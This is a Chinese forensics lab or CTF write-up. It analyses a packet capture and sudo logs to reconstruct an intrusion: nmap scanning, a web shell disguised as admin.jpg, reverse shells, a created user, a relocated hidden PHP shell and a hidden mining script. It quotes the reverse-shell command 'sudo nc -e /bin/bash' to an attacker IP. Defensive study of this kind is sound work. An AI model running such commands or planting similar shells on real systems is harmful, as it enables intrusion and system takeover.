PS:杰克创建在流量包(result.pcap)在根目录下,请根据已有信息进行分析
1、攻击者使用的端口扫描工具是?
2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?
3、审计流量日志,攻击者反弹shell的地址及端口?
4、攻击者使用的提权方式及工具是什么?
5、攻击者创建的新用户名是?
6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名
7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径
用户名及密码:security/P@ssw0rd,将/result.pcap文件下载下来:
1、攻击者使用的端口扫描工具是?
过滤出http协议,看到User-Agent值出现了nmap关键词:
答案:nmap
2、通过流量及日志审计,攻击者上传shell的时访问web使用IP地址是多少?
Ctrl F搜索关键词“upload”,看到上传了admin.jpg并用“cmd”传参来执行system()函数执行命令which nc:
答案:192.168.150.1
3、审计流量日志,攻击者反弹shell的地址及端口?
继续Ctrl F搜索关键词“admin.jpg”,不断查找,发现反弹shell信息:
答案:192.168.150.2:4444
4、攻击者使用的提权方式及工具是什么?
执行命令journalctl _COMM=sudo > sudo.txt,使用systemd的系统查看sudo命令的历史,保存为sudo.txt文件:
打开搜索关键词“192.168.150.2”发现都有8888端口和nc命令:
答案:sudo nc -e /bin/bash 192.168.150.2 8888
5、攻击者创建的新用户名是?
打开虚拟机就能发现有别的用户“securityy”:
也可以通过命令“cat /etc/passwd”列出系统上的所有用户账号:
一样能看出有个securityy用户
答案:securityy
6、攻击者将shell删除并放到了其他web目录,文件名被改变了,找出它的绝对路径及文件名
继续在sudo.txt中查找关键词“mv”,发现securityy用户在/var/www/blog目录下创建了.ShEllHAha目录,并且将原本的shell从../html/uploads/admin.jpg移动到./.ShEllHAha/.hackba.php
答案:/var/www/blog/.ShEllHAha/.hackba.php
7、攻击者使用新用户留下了木马进行不法行为,找出程序名,给出程序的绝对路径
在第六问中,往下看刚好能看到有个Wakuang.sh(谐音挖矿)关键词,发现securityy用户在/opt目录下创建了.Qwert目录并创建了.Wakuang.sh文件:
答案:/opt/.Qwert/.Wakuang.sh